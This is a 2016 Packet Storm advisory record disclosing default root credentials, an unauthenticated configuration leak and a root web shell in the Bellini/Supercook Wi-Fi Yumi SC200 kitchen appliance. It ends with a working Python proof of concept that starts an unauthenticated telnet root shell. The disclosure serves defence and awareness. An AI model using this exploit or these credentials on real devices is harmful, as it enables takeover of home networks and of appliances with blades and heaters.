Bellini/Supercook Wi-Fi Yumi SC200 Information Disclosure / Code Execution

{"hash": "5ab8a48639eba0c1a629ebb8862b99b73aca67d22af6cb2be44ba5e980ae6ae2", "sourceHref": "https://packetstormsecurity.com/files/download/138032/bellinisupercook-execdisclose.txt", "title": "Bellini/Supercook Wi-Fi Yumi SC200 Information Disclosure / Code Execution", "id": "PACKETSTORM:138032", "published": "2016-07-25T00:00:00", "description": "", "modified": "2016-07-25T00:00:00", "sourceData": "`Bellini/Supercook Wi-Fi Yumi SC200 - Multiple vulnerabilities \n \nReported By: \n================================== \nJames McLean - \nPrimary: james dot mclean at gmail dot com \nSecondary: labs at juicedigital dot net \n \nDevice Overview: \n================================== \n>From http://www.supercook.me/en/supercook/articles/btmkm800x/ \n \n\"The Bellini.SUPERCOOK Kitchen Master is much more than a multifunctional \nkitchen machine. It has 13 functions so not only saves a huge amount of \ntime, it also incorporates the Yumi control module and its own recipe \ncollection, making it incredibly easy to use.\" \n \nVulnerability Overview: \n================================== \nVuln1) Weak Username/Password for 'root' account. \nVuln2) Information disclosure, unauthenticated. \nVuln3) Remote arbitrary code execution. \n \nCVE ID's \n================================== \nNone assigned as yet. \n \nDisclosure Timeline \n================================== \n2016-06-01: Vulnerability assessment commenced. \n2016-07-04: Contacted Supercook.me support via Web Contact. No response. \n2016-07-12: Contacted Supercook.me support via Web Contact. No response. \n2016-07-12: Contacted Supercook Australia via Facebook. Supercook \nresponded, saying they will view the support request. \nNo further response recieved. \n2016-07-19: Contacted Supercook Australia via Facebook. No response. \n2016-07-21: Posted security assessment to vortex.id.au. \n2016-07-22: Mitre contacted, CVE ID's requested. \n \nIt is with regret, but ultimately due to my concern for the community \nthat own these devices, that due to lack of communication I am disclosing \nthese vulnerabilities without the involvment of the vendor. I sincerely hope \nthat the vendor can resolve these issues in a timely manner. \n \nI intend no malice by releasing these vulnerabilities, and only wish to \ninform the community so appropriate steps may be taken by the owners of \nthese devices. \n \nDue to the nature of the firmware on the device, these issues are not likely \ncaused by the vendor themselves. \n \nPlease do not use the information presented here for evil. \n \nAffected Platforms: \n================================== \nBellini/Supercook Wi-Fi Yumi SC200 - Confirmed affected: Vuln1, Vuln2, Vuln3. \nBellini/Supercook Wi-Fi Yumi SC250 - Likely affected, Vuln1, Vuln2, Vuln3, as \nsame firmware is used. \n \nAs the Wi-fi Yumi firmware appears to be based on a stock firmware image \nused on a number of other commodity 'IoT' devices, the vulnerabilities \ndescribed here are very likely to affect other devices with similar or \nthe same firmware. \n \n-- \n \nVuln1 Details: \n================================== \nWeak Username/Password for Root-level account. \nUsername: super \nPassword: super \n \nThese credentials provide access to the built in FTP server and web \nadministration interface. We did not attempt any more than a cursory \nconnection to the FTP server with these details. \n \nAccording to the details disclosed in Vuln2, an additional account is present \non the device with the following credentials: \nUsername: admin \nPassword: AlpheusDigital1010 \n \nWith the exception of a cursory check of the built in FTP service (which \nfailed for these credentials), we did not attempt to access the device with \nthese credentials. \n \nVuln1 Notes: \n================================== \nWe did not attempt to change or ascertain if it was possible to change these \naccess credentials; as Vuln2 completely negates any change made. \n \nVuln1 Mitigation: \n================================== \nIsolate the Supercook Wi-fi Yumi from any other Wireless network. \nRevert to the non-wifi Yumi controller. \n \n-- \n \nVuln2 Details: \n================================== \nInformation disclosure, unauthenticated. \n \nDevice URL: http://10.10.1.1/Setting.chipsipcmd \n \nThe device offers, via its built in webserver, a full list of all configuration \nparameters available. This list includes the above mentioned root account \nusername and password, and the password to the parent connected wifi network. \nAll details are in plain text, and transmitted in the format of a key-value \npair making retrieval, recovery and use of all configuration \ninformation trivial. \n \nThis interface is also available from the parent wi-fi network via DHCP assigned \nIPv4 address. \n \nVuln2 Notes: \n================================== \nExample data returned: \nDEF_IP_ADDR=10.10.1.1 \nDEF_SUBNET_MASK=255.255.255.0 \n... \nDEF_SUPER_NAME=\"super\" \nDEF_SUPER_PASSWORD=\"super\" \nDEF_USER_NAME=\"admin\" \nDEF_USER_PASSWORD=\"AlpheusDigital1010\" \n... \n \nVuln2 Mitigation: \n================================== \nIsolate the Supercook Wi-fi Yumi from any other Wireless network, only using \nthe mobile application to upload recipes, then disconnect from the device and \nconnect your mobile device to a trusted network once again to access the \ninternet once again. \n \nRevert to the non-wifi Yumi controller. \n \nThe vendor should establish a method of authentication to the device from the \nvarious mobile applications available, and transport any configuration in an \nencrypted format using keys which are not generally available or easily \ndiscoverable. \n \n-- \n \nVuln3 Details: \n================================== \nRemote arbitrary code execution. \n \nDevice URL: http://10.10.1.1/syscmd.asp \n \nThe device offers a built-in web-shell which, once authenticated using the \ndetails discovered in Vuln2, allows the execution of any command the device \ncan execute - as the built in webserver runs as the root user. \n \nIt is possible to execute a command using this interface that would create \nany file in any location. This would allow an attacker to establish persistence. \n \nAdditionally, the built in busybox binary includes the option \n'telnetd', meaning it is \npossible to execute the relevant command to start a telnet daemon remotely. \nThe running daemon then requires no authentication to connect, and runs as \nthe root account. \n \nVuln3 Mitigation: \n================================== \nIsolate the Supercook Wi-fi Yumi from any other Wireless network. \n \nRevert to the non-wifi Yumi controller. \n \nRemove or prevent access to /syscmd.asp and /goform/formSysCmd scripts (Please \nmind your warranty if you modify the files on the device). \n \nThe vendor should disable any and all commands on the device and scripts in \nthe web interface which are not specifically required for the normal \nfunctionality of the device or its communication with control apps. \n \nIn this instance, the vendor should REMOVE the page '/syscmd.asp' and also \n/goform/formSysCmd which processes commands submitted via syscmd.asp to prevent \narbitrary commands from being executed. \n \nAdditionally, busybox should be recompiled such that the 'telnetd' option is \nno longer available to be executed. \n \n-- \n \nVuln1/Vuln2/Vuln3 Risks: \n================================== \nWeak and easily discoverable root credentials combined with easily accessed \nremote shell functionality is a dangerous combination. These vulnerabilities \ncould allow any sufficiently advanced malware to become persistent in a LAN \nand re-infect hosts at will (advanced crypto-locker style malware comes to \nmind), capture and exfiltrate data on either Wireless network the device is \nconnected to, MITM any traffic routed through the device, or other as yet \nunknown attack vectors. \n \nAdditionally, as full root access is easily obtainable, it may be possible \nfor an attacker to cause the cooking functionality to behave erratically or \npossibly even dangerously due to the built in spinning blades and heating \nelements. While we ultimately did not attempt to control these aspects of the \ndevice due to the fact that it makes our dinner most nights, these risks are \nworth raising. \n \nThis vulnerability assessment should not be considered an exhaustive list \nof all vunlnerabilities the device may have. Due to time constraints we were \nunable to invest the required time to discover and document all issues. Due to \nthe nature of the firmware on the device, most of these have likely been \ndiscovered in other products at various times, this item may even duplicate \nanother from a similar device. \n \nNotes: \n================================== \nNo security assessment of code used for control of cooker functionality was \nundertaken; as this does not, in my opinion, rate as seriously as the other \nvulnerabilities discovered and disclosed here. However, it should be noted, \nthat with the root access that is VERY easily obtained, it may be possible for \nan attacker to cause the cooking functionality of the machine to behave \nerratically or even dangerously due to the built in spinning blades and heating \nelements. Further to this, a malicious partner or offspring may intentionally \nsabotage dinner, if he/she would prefer to eat takeout. \n \nNo attempt was made to connect to or manipulate files on the built in Samba \nshares, however given the weak credentials sufficiently advanced malware may be \nable to use these shares to establish persistence. \n \nThe 'Bellini' name may be regional, our device was procured in Australia and \nas such may or may not have a different name in other countries. \n \nA full, detailed, rundown and commentary is available at \nhttps://www.vortex.id.au/2016/07/bellini-supercook-yumi-wi-fi-the-insecurity-perspective/ \n \nVuln3 Proof of Concept: \n================================== \n#!/usr/bin/env python \n \nimport urllib \nimport urllib2 \nfrom subprocess import call \n \n# Connect to the device's wifi network, then run. \n# Root access will be provided. \n \nurl = 'http://10.10.1.1/goform/formSysCmd' \ncmd = 'busybox telnetd -l /bin/sh' \nusername = 'super' \npassword = 'super' \n \n# setup the password handler \nbasicauth = urllib2.HTTPPasswordMgrWithDefaultRealm() \nbasicauth.add_password(None, url, username, password) \n \nauthhandler = urllib2.HTTPBasicAuthHandler(basicauth) \nopener = urllib2.build_opener(authhandler) \n \nurllib2.install_opener(opener) \n \n# Connect to the device, send the data \nvalues = { \n'sysCmd': cmd, \n'apply': 'Apply', \n'submit-url': '/syscmd.asp' \n} \ndata = urllib.urlencode(values) \npagehandle = urllib2.urlopen(url, data) \n \n# Connect to Telnet. \ncall([\"telnet\",\"10.10.1.1\"]) \n \n# Pwnd. \n \n# End of document. \n \n \n`\n", "reporter": "James McLean", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "b495e04059b58bac09abde91001998e9"}, {"key": "modified", "hash": "952539204e3dcdf9fb320e71fa687278"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "952539204e3dcdf9fb320e71fa687278"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "2cb21ad9843daef2dfe150c555beae8b"}, {"key": "sourceData", "hash": "cc40e41b307d1c252ec8a8ea5ccbab58"}, {"key": "sourceHref", "hash": "4612959d94c857ab4480dd525580890b"}, {"key": "title", "hash": "8b8cf4135aa518267df91691f6d35169"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/138032/Bellini-Supercook-Wi-Fi-Yumi-SC200-Information-Disclosure-Code-Execution.html", "lastseen": "2016-11-03T10:18:02", "viewCount": 0, "enchantments": {"vulnersScore": 8.5}}